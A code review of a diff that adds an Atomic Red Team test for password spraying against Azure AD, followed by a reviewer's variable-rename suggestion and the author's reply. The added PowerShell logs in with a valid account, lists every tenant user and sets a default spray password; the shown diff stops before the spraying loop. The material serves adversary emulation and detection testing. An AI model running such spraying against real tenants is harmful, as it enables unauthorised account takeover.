atomics/T1110.003/T1110.003.yaml

```
@@ -105,3 +105,59 @@ atomic_tests:
         }
       }
       Write-Host "End of password spraying"
+
+- name: Password spray all azure AD users with a single password. 
+  auto_generated_guid: a8aa2d3e-1c52-4016-bc73-0f8854cfa80a
+  description: |
+    Attempt to brute force all domain user with a single password (called "password spraying") on Azure AD via AzureAD powershell module.
+    Valid credentials are needed to fetch the list of Azure AD users.
+  supported_platforms:
+  - windows
+  input_arguments:
+    password:
+      description: Single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)
+      type: String
+      default: P@ssw0rd!
+    valid_username:
+      description: Valid username to retrieve Azure AD users.
+      type: String
+      default: bruce.wayne@contoso.com
+    valid_password:
+      description: Valid password to authenticate as valid_username
+      type: string
+      default: iamthebatman
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AzureAD module must be installed.
+    prereq_command: |
+      if (Get-Module AzureAD) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureAD -Force
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{valid_password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{valid_username}", $Pword
+      Connect-AzureAD -Credential $Credential > $null
+
+      ($DomainUsers = Get-AzureADUser -All $true) > $null
```

```suggestion
      ($Users = Get-AzureADUser -All $true) > $null
```
They aren't "domain" users ;)

---

It is also called a domain, but i see how it can be misleading. Will fix it